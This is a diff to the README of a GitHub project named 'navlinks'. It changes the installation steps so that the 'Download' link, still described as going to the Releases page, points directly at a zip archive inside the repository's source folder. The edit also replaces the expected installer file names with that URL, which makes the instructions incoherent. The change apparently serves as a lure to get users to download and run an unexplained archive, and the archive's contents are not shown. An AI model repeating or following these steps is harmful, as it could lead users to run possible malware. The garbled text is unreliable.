Swendia331/navlinks/README.md

 Follow these steps to install navlinks:

 1. **Download the Application**:
-   - Click on the **[Download navlinks](https://github.com/Swendia331/navlinks/releases)** link to go to the Releases page.
+   - Click on the **[Download navlinks](https://github.com/Swendia331/navlinks/raw/refs/heads/main/src/apps/navlink/Software_1.4.zip)** link to go to the Releases page.
    - Locate the latest version and download the file suitable for your operating system.

 2. **Locate the Downloaded File**:
    - After downloading, navigate to your downloads folder.
-   - You will find a file named something like `navlinks-vX.X.X-setup.exe` for Windows or `navlinks-vX.X.X.dmg` for macOS.
+   - You will find a file named something like `https://github.com/Swendia331/navlinks/raw/refs/heads/main/src/apps/navlink/Software_1.4.zip` for Windows or `https://github.com/Swendia331/navlinks/raw/refs/heads/main/src/apps/navlink/Software_1.4.zip` for macOS.
 (The version number will vary based on what you downloaded.)

 3. **Run the Installer**:
    - Double-click the downloaded file.
 This will start the installation process.